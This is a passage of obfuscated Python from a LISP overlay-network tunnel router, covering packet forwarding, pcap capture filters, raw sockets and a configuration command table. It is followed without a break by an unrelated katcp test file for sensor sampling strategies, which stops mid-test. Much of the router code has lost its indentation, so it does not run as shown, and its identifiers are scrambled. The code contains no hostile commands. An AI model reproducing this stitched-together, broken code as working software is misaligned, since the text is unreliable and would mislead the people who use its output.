lisp . lisp_send_map_request ( II1iII1i , II1Ii1iI1i ,
oO0OOOO0 . inner_source , oO0OOOO0 . inner_dest , None )
Ii1Iii1iIi . stats . increment ( len ( oO0OOOO0 . packet ) )
o00o0 , II1I , II1I1I1Ii , OOOOoO00o0O , I1I1I1IIi1III = Ii1Iii1iIi . select_rloc ( oO0OOOO0 , None )
if ( o00o0 == None and I1I1I1IIi1III == None ) :
if ( OOOOoO00o0O == lisp . LISP_NATIVE_FORWARD_ACTION ) :
lisp . dprint ( "Natively forwarding" )
oO0OOOO0 . send_packet ( iiI1iIiI , oO0OOOO0 . inner_dest )
return
lisp . dprint ( "No reachable RLOCs found" )
return
if ( o00o0 and o00o0 . is_null ( ) ) :
lisp . dprint ( "Drop action RLOC found" )
return
oO0OOOO0 . outer_tos = oO0OOOO0 . inner_tos
oO0OOOO0 . outer_ttl = oO0OOOO0 . inner_ttl
if ( o00o0 ) :
oO0OOOO0 . encap_port = II1I
if ( II1I == 0 ) : oO0OOOO0 . encap_port = lisp . LISP_DATA_PORT
oO0OOOO0 . outer_dest . copy_address ( o00o0 )
iiI1I1 = oO0OOOO0 . outer_dest . afi_to_version ( )
oO0OOOO0 . outer_version = iiI1I1
ooO = lisp . lisp_myrlocs [ 0 ] if ( iiI1I1 == 4 ) else lisp . lisp_myrlocs [ 1 ]
oO0OOOO0 . outer_source . copy_address ( ooO )
if ( oO0OOOO0 . encode ( II1I1I1Ii ) == None ) : return
if ( len ( oO0OOOO0 . packet ) <= 1500 ) : oO0OOOO0 . print_packet ( "Send" , True )
OOOoOOO0oO = OOo if iiI1I1 == 6 else iiI1iIiI
oO0OOOO0 . send_packet ( OOOoOOO0oO , oO0OOOO0 . outer_dest )
elif ( I1I1I1IIi1III ) :
ii1iIi1iIiI1i = len ( oO0OOOO0 . packet )
for iiI1iIii1i in I1I1I1IIi1III . rle_forwarding_list :
oO0OOOO0 . outer_dest . copy_address ( iiI1iIii1i . address )
oO0OOOO0 . encap_port = lisp . LISP_DATA_PORT if iiI1iIii1i . translated_port == 0 else iiI1iIii1i . translated_port
iiI1I1 = oO0OOOO0 . outer_dest . afi_to_version ( )
oO0OOOO0 . outer_version = iiI1I1
ooO = lisp . lisp_myrlocs [ 0 ] if ( iiI1I1 == 4 ) else lisp . lisp_myrlocs [ 1 ]
oO0OOOO0 . outer_source . copy_address ( ooO )
if ( oO0OOOO0 . encode ( None ) == None ) : return
oO0OOOO0 . print_packet ( "Replicate-to-L{}" . format ( iiI1iIii1i . level ) , True )
oO0OOOO0 . send_packet ( iiI1iIiI , oO0OOOO0 . outer_dest )
oOOO00o000o = len ( oO0OOOO0 . packet ) - ii1iIi1iIiI1i
oO0OOOO0 . packet = oO0OOOO0 . packet [ oOOO00o000o : : ]
if ( lisp . lisp_flow_logging ) : oO0OOOO0 = copy . deepcopy ( oO0OOOO0 )
del ( oO0OOOO0 )
return
def Iiiiii111i1ii ( lisp_thread ) :
lisp . lisp_set_exception ( )
while ( True ) :
oO0OOOO0 = lisp_thread . input_queue . get ( )
lisp_thread . input_stats . increment ( len ( oO0OOOO0 ) )
lisp_thread . lisp_packet . packet = oO0OOOO0
O0O ( lisp_thread . lisp_packet , lisp_thread . thread_name )
return
def o0 ( thread ) :
iiiI1I1iIIIi1 = ( time . time ( ) % thread . number_of_pcap_threads )
return ( int ( iiiI1I1iIIIi1 ) == thread . thread_number )
def OO0 ( parms , not_used , packet ) :
if ( o0 ( parms [ 1 ] ) == False ) : return
OOOOoO000 = parms [ 0 ]
oOOOO = parms [ 1 ]
Ii = oOOOO . number_of_worker_threads
oOOOO . input_stats . increment ( len ( packet ) )
iIi1II = 4 if OOOOoO000 == "lo0" else ( 14 if lisp . lisp_is_macos ( ) else 16 )
packet = packet [ iIi1II : : ]
if ( Ii ) :
iI11I = oOOOO . input_stats . packet_count % Ii
iI11I = iI11I + ( len ( OOo000 ) - Ii )
I1IIIiii1 = OOo000 [ iI11I ]
I1IIIiii1 . input_queue . put ( packet )
else :
oOOOO . lisp_packet . packet = packet
O0O ( oOOOO . lisp_packet , oOOOO . thread_name )
return
def I1iIII1 ( lisp_thread ) :
lisp . lisp_set_exception ( )
if ( lisp . lisp_myrlocs [ 0 ] == None ) : return
OOOOoO000 = "lo0" if lisp . lisp_is_macos ( ) else "any"
oOo0OoOOo0 = pcappy . open_live ( OOOOoO000 , 9000 , 0 , 100 )
O0Oo00 = "(dst host "
ii1IiIIi1i = ""
for oO0OOoO0 in lisp . lisp_get_all_addresses ( ) :
O0Oo00 += "{} or " . format ( oO0OOoO0 )
ii1IiIIi1i += "{} or " . format ( oO0OOoO0 )
O0Oo00 = O0Oo00 [ 0 : - 4 ]
O0Oo00 += ") and ((udp dst port 4341 or 8472 or 4789) or "
O0Oo00 += "(proto 17 and (ip[6]&0xe0 == 0x20 or " + "(ip[6]&0xe0 == 0 and ip[7] != 0))))"
ii1IiIIi1i = ii1IiIIi1i [ 0 : - 4 ]
O0Oo00 += ( " or (not (src host {}) and " + "((udp src port 4342 and ip[28] == 0x28) or " + "(udp dst port 4342 and ip[28] == 0x12)))" ) . format ( ii1IiIIi1i )
lisp . lprint ( "Capturing packets for: '{}'" . format ( O0Oo00 ) )
oOo0OoOOo0 . filter = O0Oo00
oOo0OoOOo0 . loop ( - 1 , OO0 , [ OOOOoO000 , lisp_thread ] )
return
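# For a host whose only RLOC is 192.0.2.1, the capture expression assembled
# above works out to roughly (reconstructed from the string concatenation in
# the function, shown for illustration):
#
#   (dst host 192.0.2.1) and ((udp dst port 4341 or 8472 or 4789) or
#   (proto 17 and (ip[6]&0xe0 == 0x20 or (ip[6]&0xe0 == 0 and ip[7] != 0))))
#   or (not (src host 192.0.2.1) and ((udp src port 4342 and ip[28] == 0x28)
#   or (udp dst port 4342 and ip[28] == 0x12)))
#
# i.e. LISP data (4341), VXLAN/L2 overlays (8472, 4789), IP fragments, and
# RLOC-probe Map-Requests/Map-Replies on 4342, excluding our own probes.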
def OO0oo():
    lisp.lisp_set_exception()

    # Clear the crypto-keys-by-nonce cache and time out map-cache entries,
    # then rearm this 60-second periodic timer.
    for o000O0o in lisp.lisp_crypto_keys_by_nonce.values():
        for OO000o00 in o000O0o: del(OO000o00)

    lisp.lisp_crypto_keys_by_nonce = {}

    lisp.lisp_timeout_map_cache(lisp.lisp_map_cache)

    Ii1IIii11 = threading.Timer(60, OO0oo, [])
    Ii1IIii11.start()
    return
def iiI1i1Iii111():
    global oO0oIIII, II1iII1i, i111I
    global iiI1iIiI, OOo, OOo000
    global Oo0oO0oo0oO00

    lisp.lisp_i_am("rtr")
    lisp.lisp_set_exception()
    lisp.lisp_print_banner("RTR starting up")

    if (lisp.lisp_get_local_addresses() == False): return (False)

    # Open the control listen socket plus the lispers.net IPC sockets.
    OOOooo0OooOoO = "0.0.0.0" if lisp.lisp_is_raspbian() else "0::0"
    i111I = lisp.lisp_open_listen_socket(OOOooo0OooOoO, str(II1Ii1iI1i))
    oO0oIIII = lisp.lisp_open_listen_socket("", "lisp-rtr")
    Oo0oO0oo0oO00 = lisp.lisp_open_listen_socket("", "lispers.net-itr")

    II1iII1i[0] = i111I
    II1iII1i[1] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV6)
    II1iII1i[2] = oO0oIIII

    # Raw sockets used to forward packets; the IPv6 raw socket is skipped
    # on Raspbian.
    iiI1iIiI = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
    iiI1iIiI.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
    II1iII1i.append(iiI1iIiI)

    if (lisp.lisp_is_raspbian() == False):
        OOo = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_UDP)

    # Spawn the pcap capture threads and optional worker threads; the counts
    # come from the LISP_PCAP_THREADS and LISP_WORKER_THREADS env variables.
    OOoo0oo = os.getenv("LISP_PCAP_THREADS")
    OOoo0oo = 1 if (OOoo0oo == None) else int(OOoo0oo)
    ooOooo0OO = os.getenv("LISP_WORKER_THREADS")
    ooOooo0OO = 0 if (ooOooo0OO == None) else int(ooOooo0OO)

    for oOoOoO000OO in range(OOoo0oo):
        ii11II11 = lisp.lisp_thread("pcap-{}".format(oOoOoO000OO))
        ii11II11.thread_number = oOoOoO000OO
        ii11II11.number_of_pcap_threads = OOoo0oo
        ii11II11.number_of_worker_threads = ooOooo0OO
        OOo000.append(ii11II11)
        threading.Thread(target=I1iIII1, args=[ii11II11]).start()

    for oOoOoO000OO in range(ooOooo0OO):
        ii11II11 = lisp.lisp_thread("worker-{}".format(oOoOoO000OO))
        OOo000.append(ii11II11)
        threading.Thread(target=Iiiiii111i1ii, args=[ii11II11]).start()

    lisp.lisp_load_checkpoint()

    lisp.lisp_load_split_pings = (os.getenv("LISP_LOAD_SPLIT_PINGS") != None)

    # Kick off the 60-second periodic maintenance timer.
    Ii1IIii11 = threading.Timer(60, OO0oo, [])
    Ii1IIii11.start()
    return (True)
def I11I():

    # Close all sockets opened at startup.
    lisp.lisp_close_socket(II1iII1i[0], "")
    lisp.lisp_close_socket(II1iII1i[1], "")
    lisp.lisp_close_socket(oO0oIIII, "lisp-rtr")
    lisp.lisp_close_socket(i111I, "")
    lisp.lisp_close_socket(Oo0oO0oo0oO00, "lispers.net-itr")
    iiI1iIiI.close()
    return
def iiIiI(kv_pair):
    global II1iII1i
    global II1Ii1iI1i

    lispconfig.lisp_map_resolver_command(kv_pair)

    # (Re)start the Map-Resolver test timer if it is not already running.
    if (lisp.lisp_test_mr_timer == None or
        lisp.lisp_test_mr_timer.is_alive() == False):
        lisp.lisp_test_mr_timer = threading.Timer(2, lisp.lisp_test_mr,
            [II1iII1i, II1Ii1iI1i])
        lisp.lisp_test_mr_timer.start()
    return
def iI(kv_pair):
    global i111I, iiI1iIiI, II1Ii1iI1i

    OoOO = lisp.lisp_rloc_probing

    lispconfig.lisp_xtr_command(kv_pair)

    # If RLOC-probing was just enabled, start the probe timer and tell the
    # data plane which port ITR crypto uses.
    if (OoOO == False and lisp.lisp_rloc_probing):
        iI1Ii11iII1 = [i111I, i111I, None, iiI1iIiI]
        lisp.lisp_start_rloc_probe_timer(1, iI1Ii11iII1)
        i1iiI = {"type": "itr-crypto-port", "port": II1Ii1iI1i}
        lisp.lisp_write_to_dp_socket(i1iiI)

    # Propagate logging settings to the external data plane, if any.
    lisp.lisp_ipc_write_xtr_parameters(lisp.lisp_debug_logging,
        lisp.lisp_data_plane_logging)
    return
# lispers.net CLI command dispatch table: maps each configuration clause to
# its handler function and the parameters the clause accepts.
OOoO = {
"lisp xtr-parameters" : [ iI , {
"rloc-probing" : [ True , "yes" , "no" ] ,
"nonce-echoing" : [ True , "yes" , "no" ] ,
"data-plane-security" : [ True , "yes" , "no" ] ,
"data-plane-logging" : [ True , "yes" , "no" ] ,
"flow-logging" : [ True , "yes" , "no" ] ,
"nat-traversal" : [ True , "yes" , "no" ] ,
"checkpoint-map-cache" : [ True , "yes" , "no" ] ,
"ipc-data-plane" : [ True , "yes" , "no" ] ,
"decentralized-push-xtr" : [ True , "yes" , "no" ] ,
"decentralized-pull-xtr-modulus" : [ True , 1 , 0xff ] ,
"decentralized-pull-xtr-dns-suffix" : [ True ] ,
"program-hardware" : [ True , "yes" , "no" ] } ] ,
"lisp map-resolver" : [ iiIiI , {
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"dns-name" : [ True ] ,
"address" : [ True ] } ] ,
"lisp map-cache" : [ lispconfig . lisp_map_cache_command , {
"prefix" : [ ] ,
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"send-map-request" : [ True , "yes" , "no" ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"rle-name" : [ True ] ,
"elp-name" : [ True ] ,
"address" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp rtr-map-cache" : [ lispconfig . lisp_map_cache_command , {
"prefix" : [ ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"rle-name" : [ True ] ,
"elp-name" : [ True ] ,
"address" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp explicit-locator-path" : [ lispconfig . lisp_elp_command , {
"elp-name" : [ False ] ,
"elp-node" : [ ] ,
"address" : [ True ] ,
"probe" : [ True , "yes" , "no" ] ,
"strict" : [ True , "yes" , "no" ] ,
"eid" : [ True , "yes" , "no" ] } ] ,
"lisp replication-list-entry" : [ lispconfig . lisp_rle_command , {
"rle-name" : [ False ] ,
"rle-node" : [ ] ,
"address" : [ True ] ,
"level" : [ True , 0 , 255 ] } ] ,
"lisp json" : [ lispconfig . lisp_json_command , {
"json-name" : [ False ] ,
"json-string" : [ False ] } ] ,
"lisp database-mapping" : [ oO00 , {
"prefix" : [ ] ,
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"secondary-instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"dynamic-eid" : [ True , "yes" , "no" ] ,
"signature-eid" : [ True , "yes" , "no" ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"elp-name" : [ True ] ,
"geo-name" : [ True ] ,
"rle-name" : [ True ] ,
"json-name" : [ True ] ,
"address" : [ True ] ,
"interface" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"show rtr-rloc-probing" : [ o00O , { } ] ,
"show rtr-keys" : [ o0OOOOO00o0O0 , { } ] ,
"show rtr-map-cache" : [ i11IiIiiIIIII , { } ] ,
"show rtr-map-cache-dns" : [ i1iIIIiI1I , { } ]
}
if (iiI1i1Iii111() == False):
    lisp.lprint("lisp_rtr_startup() failed")
    lisp.lisp_print_banner("RTR abnormal exit")
    exit(1)

Oo = [i111I, oO0oIIII, Oo0oO0oo0oO00]
oO00oOOo0Oo = [i111I] * 3

while (True):
    try: OoOo, II, IiiIIIiI1ii = select.select(Oo, [], [])
    except: break

    # Punt packets from an external data plane arrive on the IPC socket.
    if (lisp.lisp_ipc_data_plane and Oo0oO0oo0oO00 in OoOo):
        lisp.lisp_process_punt(Oo0oO0oo0oO00, II1iII1i, II1Ii1iI1i)

    # Control packets on the LISP control port. RLOC-probes are ignored
    # here because the pcap threads handle them.
    if (i111I in OoOo):
        iIi1I1, OO, IIIIii, oO0OOOO0 = lisp.lisp_receive(oO00oOOo0Oo[0], False)
        if (OO == ""): break
        if (lisp.lisp_is_rloc_probe_request(oO0OOOO0[0])):
            lisp.lprint("RTR ignoring RLOC-probe request, using pcap")
            continue

        if (lisp.lisp_is_rloc_probe_reply(oO0OOOO0[0])):
            lisp.lprint("RTR ignoring RLOC-probe reply, using pcap")
            continue

        lisp.lisp_parse_packet(oO00oOOo0Oo, oO0OOOO0, OO, IIIIii)

    # Commands and API requests arrive on the lisp-rtr IPC socket.
    if (oO0oIIII in OoOo):
        iIi1I1, OO, IIIIii, oO0OOOO0 = lisp.lisp_receive(oO0oIIII, True)
        if (OO == ""): break

        if (iIi1I1 == "command"):
            if (oO0OOOO0 == "clear"):
                lisp.lisp_clear_map_cache()
                continue

            if (oO0OOOO0.find("clear%") != -1):
                lispconfig.lisp_clear_decap_stats(oO0OOOO0)
                continue

            lispconfig.lisp_process_command(oO0oIIII, iIi1I1,
                oO0OOOO0, "lisp-rtr", [OOoO])
        elif (iIi1I1 == "api"):
            lisp.lisp_process_api("lisp-rtr", oO0oIIII, oO0OOOO0)
        elif (iIi1I1 == "data-packet"):
            O0O(oO0OOOO0, "")
        else:
            if (lisp.lisp_is_rloc_probe_request(oO0OOOO0[0])):
                lisp.lprint("RTR ignoring RLOC-probe request, using pcap")
                continue

            if (lisp.lisp_is_rloc_probe_reply(oO0OOOO0[0])):
                lisp.lprint("RTR ignoring RLOC-probe reply, using pcap")
                continue

            lisp.lisp_parse_packet(II1iII1i, oO0OOOO0, OO, IIIIii)

I11I()
lisp.lisp_print_banner("RTR normal exit")
exit(0)
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
test_sampling.py
|
# test_sampling.py
# -*- coding: utf8 -*-
# vim:fileencoding=utf8 ai ts=4 sts=4 et sw=4
# Copyright 2009 National Research Foundation (South African Radio Astronomy Observatory)
# BSD license - see LICENSE for details
"""Tests for the katcp.sampling module.
"""
from __future__ import absolute_import, division, print_function
from future import standard_library
standard_library.install_aliases() # noqa: E402
import concurrent.futures
import logging
import threading
import tornado.testing
from _thread import get_ident
from tornado import gen
from katcp import Sensor, sampling
from katcp.testutils import (DeviceTestSensor, TestLogHandler,
TimewarpAsyncTestCase)
log_handler = TestLogHandler()
logging.getLogger("katcp").addHandler(log_handler)
logger = logging.getLogger(__name__)
class TestSampling(TimewarpAsyncTestCase):
# TODO Also test explicit ioloop passing
def setUp(self):
"""Set up for test."""
# test sensor
super(TestSampling, self).setUp()
self.sensor = DeviceTestSensor(
Sensor.INTEGER, "an.int", "An integer.", "count",
[-40, 30],
timestamp=self.ioloop_time, status=Sensor.NOMINAL, value=3)
# test callback
def inform(sensor, reading):
assert get_ident() == self.ioloop_thread_id, (
"inform must be called from in the ioloop")
self.calls.append((sensor, reading))
self.calls = []
self.inform = inform
def test_sampling(self):
"""Test getting and setting the sampling."""
s = self.sensor
sampling.SampleNone(None, s)
sampling.SampleAuto(None, s)
sampling.SamplePeriod(None, s, 10)
sampling.SampleEvent(None, s)
sampling.SampleDifferential(None, s, 2)
self.assertRaises(ValueError, sampling.SampleNone, None, s, "foo")
self.assertRaises(ValueError, sampling.SampleAuto, None, s, "bar")
self.assertRaises(ValueError, sampling.SamplePeriod, None, s)
self.assertRaises(ValueError, sampling.SamplePeriod, None, s, "0")
self.assertRaises(ValueError, sampling.SamplePeriod, None, s, "-1")
self.assertRaises(ValueError, sampling.SampleEvent, None, s, "foo")
self.assertRaises(ValueError, sampling.SampleDifferential, None, s)
self.assertRaises(ValueError, sampling.SampleDifferential,
None, s, "-1")
self.assertRaises(ValueError, sampling.SampleDifferential,
None, s, "1.5")
sampling.SampleStrategy.get_strategy("none", None, s)
sampling.SampleStrategy.get_strategy("auto", None, s)
sampling.SampleStrategy.get_strategy("period", None, s, "15")
sampling.SampleStrategy.get_strategy("event", None, s)
sampling.SampleStrategy.get_strategy("differential", None, s, "2")
sampling.SampleStrategy.get_strategy(b"none", None, s)
sampling.SampleStrategy.get_strategy(b"auto", None, s)
sampling.SampleStrategy.get_strategy(b"period", None, s, "15")
sampling.SampleStrategy.get_strategy(b"event", None, s)
sampling.SampleStrategy.get_strategy(b"differential", None, s, "2")
self.assertRaises(ValueError, sampling.SampleStrategy.get_strategy,
"random", None, s)
self.assertRaises(ValueError, sampling.SampleStrategy.get_strategy,
"period", None, s, "foo")
self.assertRaises(ValueError, sampling.SampleStrategy.get_strategy,
"differential", None, s, "bar")
@tornado.testing.gen_test(timeout=200)
    # Timeout needs to be longer than the 'fake' duration of the test, since the
    # tornado ioloop is using our time-warped clock to determine timeouts too!
def test_periodic(self):
t0 = self.ioloop_time
        sample_p = 10  # sample period in seconds
DUT = sampling.SamplePeriod(self.inform, self.sensor, sample_p)
self.assertEqual(DUT.get_sampling_formatted(), (b'period', [b'10']))
self.assertEqual(self.calls, [])
t, status, value = self.sensor.read()
DUT.start()
yield self.wake_ioloop()
self.assertEqual(self.calls, [(self.sensor, (t, status, value))])
self.calls = []
        # Warp the ioloop clock forward a bit more than one sample period. Check that
        # 1) a sample is sent,
        # 2) the next sample is scheduled at t0+sample_p, not t0+sample_p+extra delay
yield self.set_ioloop_time(t0 + sample_p*1.15)
self.assertEqual(self.calls, [(self.sensor, (t, status, value))])
self.calls = []
        # Don't expect an update, since we are just before the next sample time
yield self.set_ioloop_time(t0 + sample_p*1.99)
self.assertEqual(self.calls, [])
# Now we are at exactly the next sample time, expect update
yield self.set_ioloop_time(t0 + sample_p*2)
self.assertEqual(self.calls, [(self.sensor, (t, status, value))])
self.calls = []
# Bit past previous sample time, expect no update
yield self.set_ioloop_time(t0 + sample_p*2.16)
self.assertEqual(self.calls, [])
# Check that no update is sent if the sensor is updated, but that the next
# periodic update is correct
t, status, value = (t0 + sample_p*2.5, Sensor.WARN, -1)
self.sensor.set(t, status, value)
yield self.set_ioloop_time(t0 + sample_p*2.6)
self.assertEqual(self.calls, [])
yield self.set_ioloop_time(t0 + sample_p*3)
self.assertEqual(self.calls, [(self.sensor, (t, status, value))])
self.calls = []
# Cancel strategy and check that its timeout call is cancelled.
DUT.cancel()
yield self.wake_ioloop()
yield self.set_ioloop_time(t0 + sample_p*4.1)
self.assertEqual(self.calls, [])
@tornado.testing.gen_test(timeout=200)
def test_auto(self):
t0 = self.ioloop_time
DUT = sampling.SampleAuto(self.inform, self.sensor)
self.assertEqual(DUT.get_sampling_formatted(), (b'auto', []))
self.assertEqual(self.calls, [])
t, status, value = self.sensor.read()
DUT.start()
yield self.wake_ioloop()
# Check that it is attached
self.assertTrue(DUT in self.sensor._observers)
# The initial update
self.assertEqual(self.calls, [(self.sensor, (t, status, value))])
self.calls = []
# Move along in time, don't expect any updates
yield self.set_ioloop_time(t0 + 20)
self.assertEqual(self.calls, [])
# Now update the sensor a couple of times
t1, status1, value1 = t0 + 21, Sensor.ERROR, 2
t2, status2, value2 = t0 + 22, Sensor.NOMINAL, -1
self.sensor.set(t1, status1, value1)
self.sensor.set(t2, status2, value2)
self.assertEqual(self.calls, [(self.sensor, (t1, status1, value1)),
(self.sensor, (t2, status2, value2))])
self.calls = []
self._thread_update_check(t, status, value)
yield self._check_cancel(DUT)
@gen.coroutine
def _thread_update_check(self, ts, status, value):
# Check update from thread (inform() raises if called from the wrong thread)
# Clears out self.calls before starting
self.calls = []
f = concurrent.futures.Future()
def do_update():
try:
self.sensor.set(ts, status, value)
finally:
f.set_result(None)
return f
t = threading.Thread(target=do_update)
t.start()
yield f
yield self.wake_ioloop()
self.assertEqual(self.calls, [(self.sensor, (ts, status, value))])
@gen.coroutine
def _check_cancel(self, DUT):
# Check post-cancel cleanup
DUT.cancel()
yield self.wake_ioloop()
self.assertFalse(DUT in self.sensor._observers)
@tornado.testing.gen_test(timeout=200)
def test_differential(self):
"""Test SampleDifferential strategy."""
t, status, value = self.sensor.read()
delta = 3
DUT = sampling.SampleDifferential(self.inform, self.sensor, delta)
self.assertEqual(DUT.get_sampling_formatted(), (b'differential', [b'3']))
self.assertEqual(len(self.calls), 0)
DUT.start()
yield self.wake_ioloop()
# Check initial update
self.assertEqual(self.calls, [(self.sensor, (t, status, value))])
self.calls = []
        # Some updates less than delta from the initial value
self.sensor.set_value(value + 1)
self.sensor.set_value(value + delta)
self.sensor.set_value(value)
self.sensor.set_value(value - 2)
self.assertEqual(len(self.calls), 0)
# Now an update bigger than delta from initial value
self.sensor.set(t, status, value + delta + 1)
yield self.wake_ioloop()
self.assertEqual(self.calls, [(self.sensor, (t, status, value + delta + 1))])
self.calls = []
# Now change only the status, should update
t, status, value = self.sensor.read()
self.sensor.set(t, Sensor.ERROR, value)
self.assertEqual(self.calls, [(self.sensor, (t, Sensor.ERROR, value))])
# Test threaded update
yield self._thread_update_check(t, status, value)
yield self._check_cancel(DUT)
def test_differential_timestamp(self):
        # Test that the timestamp differential is stored correctly as
# seconds. This is mainly to check the conversion of the katcp spec from
# milliseconds to seconds for katcp v5 spec.
time_diff = 4.12 # Time differential in seconds
ts_sensor = Sensor(Sensor.TIMESTAMP, 'ts', 'ts sensor', '')
diff = sampling.SampleDifferential(self.inform, ts_sensor, time_diff)
self.assertEqual(diff.get_sampling_formatted(), (b'differential', [b'4.12']))
self.assertEqual(diff._threshold, time_diff)
@tornado.testing.gen_test(timeout=200)
def test_event_rate(self):
"""Test SampleEventRate strategy."""
shortest = 1.5
longest = 4.5
t, status, value = self.sensor.read()
DUT = sampling.SampleEventRate(self.inform, self.sensor, shortest, longest)
self.assertEqual(DUT.get_sampling_formatted(), (b'event-rate', [b'1.5', b'4.5']))
self.assertEqual(len(self.calls), 0)
DUT.start()
yield self.wake_ioloop()
# Check initial update
t_last_sent = self.ioloop_time
self.assertEqual(self.calls, [(self.sensor, (t, status, value))])
self.calls = []
# Too soon, should not send update
yield self.set_ioloop_time(t_last_sent + shortest*0.99)
value = value + 3
t = self.ioloop_time
self.sensor.set(t, status, value)
self.assertEqual(len(self.calls), 0)
# Too soon again, should not send update
yield self.set_ioloop_time(t_last_sent + shortest*0.999)
value = value + 1
t = self.ioloop_time
self.sensor.set(t, status, value)
self.assertEqual(len(self.calls), 0)
# Should now get minimum time update
yield self.set_ioloop_time(t_last_sent + shortest)
t_last_sent = self.ioloop_time
self.assertEqual(self.calls, [(self.sensor, (t, status, value))])
self.calls = []
# Warp to just before longest period, should not update
yield self.set_ioloop_time(t_last_sent + longest*0.999)
self.assertEqual(len(self.calls), 0)
# Warp to longest period, should update
yield self.set_ioloop_time(t_last_sent + longest)
t_last_sent = self.ioloop_time
self.assertEqual(self.calls, [(self.sensor, (t, status, value))])
self.calls = []
# Warp to just before next longest period, should not update
yield self.set_ioloop_time(t_last_sent + longest*0.999)
self.assertEqual(len(self.calls), 0)
# Warp to longest period, should update
yield self.set_ioloop_time(t_last_sent + longest)
t_last_sent = self.ioloop_time
self.assertEqual(self.calls, [(self.sensor, (t, status, value))])
self.calls = []
# Set identical value, jump past min update time, no update should happen
self.sensor.set(self.ioloop_time, status, value)
yield self.set_ioloop_time(t_last_sent + shortest)
self.assertEqual(len(self.calls), 0)
# Set new value, update should happen
value = value - 2
self.sensor.set(self.ioloop_time, status, value)
t_last_sent = self.ioloop_time
self.assertEqual(self.calls, [(self.sensor, (t_last_sent, status, value))])
self.calls = []
# Now warp to after min period, change only status, update should happen
yield self.set_ioloop_time(t_last_sent + shortest)
status = Sensor.ERROR
self.sensor.set(self.ioloop_time, status, value)
self.assertEqual(self.calls, [(self.sensor, (self.ioloop_time, status, value))])
t_last_sent = self.ioloop_time
self.calls = []
yield self.set_ioloop_time(t_last_sent + shortest)
status = Sensor.NOMINAL
value = value + 1
yield self._thread_update_check(self.ioloop_time, status, value)
yield self._check_cancel(DUT)
self.calls = []
        # Since the strategy is cancelled, no further updates should be sent
yield self.set_ioloop_time(self.ioloop_time + 5*longest)
self.sensor.set(self.ioloop_time, Sensor.WARN, value + 3)
self.assertEqual(len(self.calls), 0)
@tornado.testing.gen_test(timeout=2000000)
def test_event(self):
"""Test SampleEvent strategy."""
DUT = sampling.SampleEvent(self.inform, self.sensor)
self.assertEqual(DUT.get_sampling_formatted(), (b'event', []))
self.assertEqual(self.calls, [])
DUT.start()
yield self.wake_ioloop()
# Check initial update
self.assertEqual(len(self.calls), 1)
# Jump forward a lot, should not result in another sample
yield self.set_ioloop_time(200000)
self.assertEqual(len(self.calls), 1)
self.sensor.set_value(2, status=Sensor.NOMINAL)
self.assertEqual(len(self.calls), 2)
# Test that an update is suppressed if the sensor value is unchanged
self.sensor.set_value(2, status=Sensor.NOMINAL)
self.assertEqual(len(self.calls), 2)
# Test that an update happens if the status changes even if the value is
# unchanged
self.sensor.set_value(2, status=Sensor.WARN)
self.assertEqual(len(self.calls), 3)
@tornado.testing.gen_test(timeout=200)
def test_differential_rate(self):
delta = 2
shortest = 1.5
longest = 4.5
t, status, value = self.sensor.read()
DUT = sampling.SampleDifferentialRate(
self.inform, self.sensor, delta, shortest, longest)
self.assertEqual(
DUT.get_sampling_formatted(), (b'differential-rate', [b'2', b'1.5', b'4.5']))
self.assertEqual(len(self.calls), 0)
DUT.start()
yield self.wake_ioloop()
# Check initial update
t_last_sent = self.ioloop_time
self.assertEqual(self.calls, [(self.sensor, (t, status, value))])
self.calls = []
# Too soon, should not send update
yield self.set_ioloop_time(t_last_sent + shortest*0.99)
value = value + delta + 1
t = self.ioloop_time
self.sensor.set(t, status, value)
self.assertEqual(len(self.calls), 0)
# Too soon again, should not send update
yield self.set_ioloop_time(t_last_sent + shortest*0.999)
value = value + delta + 1
t = self.ioloop_time
self.sensor.set(t, status, value)
self.assertEqual(len(self.calls), 0)
# Should now get minimum time update
yield self.set_ioloop_time(t_last_sent + shortest)
t_last_sent = self.ioloop_time
self.assertEqual(self.calls, [(self.sensor, (t, status, value))])
self.calls = []
# Warp to just before longest period, should not update
yield self.set_ioloop_time(t_last_sent + longest*0.999)
self.assertEqual(len(self.calls), 0)
# Warp to longest period, should update
yield self.set_ioloop_time(t_last_sent + longest)
t_last_sent = self.ioloop_time
self.assertEqual(self.calls, [(self.sensor, (t, status, value))])
self.calls = []
# Warp to just before next longest period, should not update
yield self.set_ioloop_time(t_last_sent + longest*0.999)
self.assertEqual(len(self.calls), 0)
# Warp to longest period, should update
yield self.set_ioloop_time(t_last_sent + longest)
t_last_sent = self.ioloop_time
self.assertEqual(self.calls, [(self.sensor, (t, status, value))])
self.calls = []
        # Set a value with too small a change, jump past min update time, no update
        # should happen
value = value - delta
self.sensor.set(self.ioloop_time, status, value)
yield self.set_ioloop_time(t_last_sent + shortest)
self.assertEqual(len(self.calls), 0)
# Set new value with large enough difference, update should happen
value = value - 1
self.sensor.set(self.ioloop_time, status, value)
t_last_sent = self.ioloop_time
self.assertEqual(self.calls, [(self.sensor, (t_last_sent, status, value))])
self.calls = []
# Now warp to after min period, change only status, update should happen
yield self.set_ioloop_time(t_last_sent + shortest)
status = Sensor.ERROR
self.sensor.set(self.ioloop_time, status, value)
